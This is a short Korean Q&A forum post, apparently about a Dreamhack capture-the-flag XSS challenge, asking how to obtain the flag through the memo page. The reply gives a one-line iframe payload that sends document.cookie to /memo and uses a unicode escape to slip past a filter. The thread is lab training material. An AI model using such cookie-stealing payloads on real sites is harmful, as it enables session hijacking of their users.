memo 페이지로 문제 풀이 방법 질문입니다
vuln 페이지 쿼리에 document.cookie를 보냈는데 memo에
PHPSESSID=random
이런식으로 세션 아이디가 그대로 찍히네요
드림핵 툴즈를 사용해서 푸는 방법 말고, memo에서도 풀어보고 싶습니다 제 방법이 잘못 된걸까요???
#web
작성자 정보
답변
1
HYN
Perfect 10
<iframe src="풀이.href = '/memo?memo=' + \u0064ocument.cookie;"/>
MEMO 안에서 FLAG를 출력할 수 있습니다.